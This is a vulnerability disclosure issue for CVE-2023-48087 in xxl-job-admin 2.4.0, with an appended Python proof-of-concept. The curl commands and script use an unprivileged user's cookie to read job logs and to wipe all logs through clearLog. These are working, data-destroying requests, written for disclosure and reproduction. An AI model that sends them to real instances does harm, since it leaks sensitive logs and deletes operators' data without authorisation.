Headline
CVE-2023-48087: Permission Vulnerability of Path /xxl-job-admin/joblog/clearLog & /xxl-job-admin/joblog/logDetailCat · Issue #3330 · xuxueli/xxl-job
xxl-job-admin 2.4.0 is vulnerable to Insecure Permissions via /xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailCat.
Environment
MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)
Vulnerability Information
Direct requests to /xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailCat are served without checking the caller's privilege, so any authenticated user, including one with no job-group permissions, can read job logs (sensitive information leakage) and delete them (data loss).
Steps to reproduce the behavior
Step 1: In the web console, create a normal (non-admin) user with no permission on any executor/job group.
Step 2: Log in as that user and copy the value of its XXL_JOB_LOGIN_IDENTITY cookie.
Step 3: Query a job log with that cookie:
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/logDetailCat" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'logId=9&fromLineNum=1'
The request succeeds: the server answers HTTP 200 with the log content, although the user has no permission on that job.
Step 4: Clear the logs with the same cookie:
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/clearLog" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'jobGroup=0&jobId=0&type=9'
This request also returns HTTP 200.
Step 5: Open the job log page in the console. All logs have been cleared by the normal user.
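As an added example (not part of the original issue and not xxl-job's own code), the following Python script sends the same two POSTs as Steps 3 and 4 using only the standard library and classifies each answer. The base URL, the cookie value, the logId and the jobGroup/jobId/type values are taken from the issue; the assumption that xxl-job-admin answers these endpoints with its ReturnT JSON envelope ({"code": 200, "msg": ..., "content": ...}) is mine and is marked in the code. The destructive clearLog request is kept behind an explicit flag, because as Step 5 shows, type=9 removes every job log on the instance.

```python
"""Probe for the missing permission check on xxl-job-admin's joblog endpoints.

Added example, not from the issue or the xxl-job project. Assumptions:
  - the login cookie is XXL_JOB_LOGIN_IDENTITY (as in the issue's curl commands)
  - successful answers are xxl-job's ReturnT JSON: {"code": 200, "msg": ..., "content": ...}
  - an unauthorised caller gets a redirect to the login page (HTML), a non-200
    status, or a ReturnT with code != 200
"""
import json
import urllib.error
import urllib.parse
import urllib.request

COOKIE_NAME = "XXL_JOB_LOGIN_IDENTITY"                 # cookie name from the issue
LOG_DETAIL_PATH = "/xxl-job-admin/joblog/logDetailCat"  # read endpoint (non-destructive)
CLEAR_LOG_PATH = "/xxl-job-admin/joblog/clearLog"       # write endpoint (clears logs)


def build_request(base_url, cookie_value, path, form):
    """Build the POST exactly as the issue's curl commands do.

    Returns (url, headers, body) so the request can be inspected without sending it.
    """
    url = base_url.rstrip("/") + path
    body = urllib.parse.urlencode(form).encode()
    headers = {
        "Cookie": "%s=%s" % (COOKIE_NAME, cookie_value),
        "Content-Type": "application/x-www-form-urlencoded",
    }
    return url, headers, body


def interpret(status, body):
    """Classify an xxl-job-admin answer as 'allowed' or 'refused'.

    'allowed' means the endpoint performed the action for this cookie, i.e. no
    admin or job-group permission was enforced. Anything else (login page HTML
    after a redirect, non-200 status, ReturnT with another code) is 'refused'.
    ReturnT shape is an assumption, see module docstring.
    """
    if status != 200:
        return "refused"
    try:
        data = json.loads(body)
    except ValueError:
        return "refused"  # e.g. the HTML login page instead of JSON
    if isinstance(data, dict) and data.get("code") == 200:
        return "allowed"
    return "refused"


def send(url, headers, body, timeout=10):
    """Send one POST; return (status, body_text). urllib follows redirects itself."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe(base_url, cookie_value, log_id=9, destructive=False):
    """Run Step 3 always and Step 4 only on request (type=9 clears all logs)."""
    results = {}
    url, headers, body = build_request(
        base_url, cookie_value, LOG_DETAIL_PATH, {"logId": log_id, "fromLineNum": 1})
    results["logDetailCat"] = interpret(*send(url, headers, body))
    if destructive:
        url, headers, body = build_request(
            base_url, cookie_value, CLEAR_LOG_PATH, {"jobGroup": 0, "jobId": 0, "type": 9})
        results["clearLog"] = interpret(*send(url, headers, body))
    return results


if __name__ == "__main__":
    import sys
    # usage: python probe.py http://<IP address:port> <normal user cookie> [--clear]
    base, cookie = sys.argv[1], sys.argv[2]
    print(probe(base, cookie, destructive="--clear" in sys.argv[3:]))
```

An 'allowed' result for logDetailCat with a cookie that belongs to a user without permission on the job reproduces the information-leakage half of the issue without touching any data; pass --clear only on a lab instance, because it replays Step 4 and the logs will be gone.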